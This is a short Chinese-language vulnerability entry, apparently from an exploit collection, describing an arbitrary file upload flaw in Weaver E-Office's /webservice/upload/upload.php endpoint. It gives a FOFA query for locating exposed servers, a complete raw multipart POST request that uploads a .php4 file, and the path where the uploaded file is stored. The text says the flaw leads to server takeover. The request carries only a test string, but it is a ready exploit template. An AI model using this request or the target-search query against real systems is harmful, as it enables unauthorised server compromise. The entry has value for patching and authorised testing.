泛微-eoffice-webservice-file-upload任意文件上传漏洞
泛微-eoffice-webservice-file-upload任意文件上传漏洞
泛微/webservice/upload/upload.php接口存在任意文件上传漏洞,导致获取服务器权限。
fofa
app="泛微-EOffice"
poc
POST /webservice/upload/upload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate, br
Content-Type:multipart/form-data; boundary=--------------------------553898708333958420021355
----------------------------553898708333958420021355
Content-Disposition: form-data; name="file"; filename="qq_test.php4"
Content-Type: application/octet-stream
qqtest
----------------------------553898708333958420021355--
文件路径http://127.0.0.1\attachment\文件名